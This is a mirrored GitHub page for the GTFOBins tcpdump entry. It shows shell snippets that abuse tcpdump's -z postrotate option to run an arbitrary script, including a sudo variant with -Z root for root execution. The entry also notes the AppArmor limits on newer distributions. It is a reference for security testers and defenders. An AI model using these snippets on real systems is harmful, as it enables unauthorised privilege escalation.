mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
c37da57373
For certain distributions running tcpdump without providing -Z (user) argument causes the provided command to be executed as the `tcpdump` user which has low privileges by default.
22 lines
704 B
Markdown
22 lines
704 B
Markdown
---
|
|
description: |
|
|
These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
|
|
|
|
In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the `postrotate-command` to a small subset of predefined commands thus preventing the execution of the following.
|
|
functions:
|
|
command:
|
|
- code: |
|
|
COMMAND='id'
|
|
TF=$(mktemp)
|
|
echo "$COMMAND" > $TF
|
|
chmod +x $TF
|
|
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
|
|
sudo:
|
|
- code: |
|
|
COMMAND='id'
|
|
TF=$(mktemp)
|
|
echo "$COMMAND" > $TF
|
|
chmod +x $TF
|
|
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
|
|
---
|